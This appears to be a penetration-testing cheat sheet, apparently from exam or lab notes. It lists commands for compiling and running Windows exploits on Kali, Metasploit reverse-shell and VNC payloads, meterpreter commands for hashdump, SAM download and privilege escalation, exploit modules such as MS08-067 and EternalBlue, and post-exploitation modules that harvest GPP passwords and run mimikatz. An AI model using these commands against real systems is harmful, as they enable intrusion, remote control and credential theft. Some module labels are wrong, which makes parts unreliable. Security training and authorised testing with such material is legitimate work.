COMPILING

Compiling Windows executable on Kali

Compile

i686-w64-mingw32-gcc exploit.c -lws2_32 -o exploit.exe

Execute

wine exploit.exe 10.11.1.35

METASPLOIT

Windows reverse meterpreter payload

set payload windows/meterpreter/reverse_tcp

Windows VNC Meterpreter payload

set payload windows/vncinject/reverse_tcpset ViewOnly false

Linux Reverse Meterpreter payload

set payload linux/meterpreter/reverse_tcp

List of Metasploit Commands, Meterpreter Cheat Sheet

Useful meterpreter commands.

Command | Description

upload file c:\\windowsMeterpreter
download c:\\windows\\repair\\sam /tmp
execute -f c:\\windows\temp\exploit.exe
ps | Meterpreter show processes
shell | Meterpreter get shell on the target
getsystem | Meterpreter attempts priviledge escalation the target
hashdump | Meterpreter attempts to dump the hashes on the target
portfwd add –l 3389 –p 3389 –r target | Meterpreter create port forward to target machine
portfwd delete –l 3389 –p 3389 –r target | Meterpreter delete port forward

 

Common Metasploit Modules

Remote Windows Metasploit Modules (exploits)

Command | Description

use exploit /windows/smb/ms08_067_netapi 

| MS08_067 Windows 2k, XP, 2003 Remote Exploit

use exploit /windows/dcerpc/ms06_040_netapi 

| MS08_040 Windows NT, 2k, XP, 2003 Remote Exploit

use exploit /windows/smb/ms09_050_smb2_negotiate_func_index 

| MS09_050 Windows Vista SP1/SP2 and Server 2008 (x86) Remote Exploit

use exploit /windows/smb/ms17_10_eternalblue

MS 17_10 Eternal Blue Remote Exploit

Local Windows Metasploit Modules (exploits)

use exploit/windows/local/bypassuac

Bypass UAC on Windows 7 + Set target + arch, x86/64

 

Auxilary Metasploit Modules

Command | Description

use auxiliary/scanner/http/dir_scanner | Metasploit HTTP directory scanner

use auxiliary/scanner/http/jboss_vulnscan | Metasploit JBOSS vulnerability scanner

use auxiliary/scanner/mssql/mssql_login | Metasploit MSSQL Credential Scanner

use auxiliary/scanner/mysql/mysql_version | Metasploit MSSQL Version Scanner

use auxiliary/scanner/oracle/oracle_login | Metasploit Oracle Login Module

 

Metasploit Powershell Modules

Command | Description

use exploit/multi/script/web_delivery | Metasploit powershell payload delivery module

post/windows/manage/powershell/exec_powershell | Metasploit upload and run powershell script through a session

use exploit/multi/http/jboss_maindeployer | Metasploit JBOSS deploy

use exploit/windows/mssql/mssql_payload | Metasploit MSSQL payload

 

Post Exploit Windows Metasploit Modules

CommandDescription

run post/windows/gather/win_privs | Metasploit show privileges of current user

use post/windows/gather/credentials/gpp | Metasploit grab GPP saved passwords

load mimikatz -> wdigest | Metasplit load Mimikatz

run post/windows/gather/local_admin_search_enum | Idenitfy other machines that the supplied domain user has administrative access to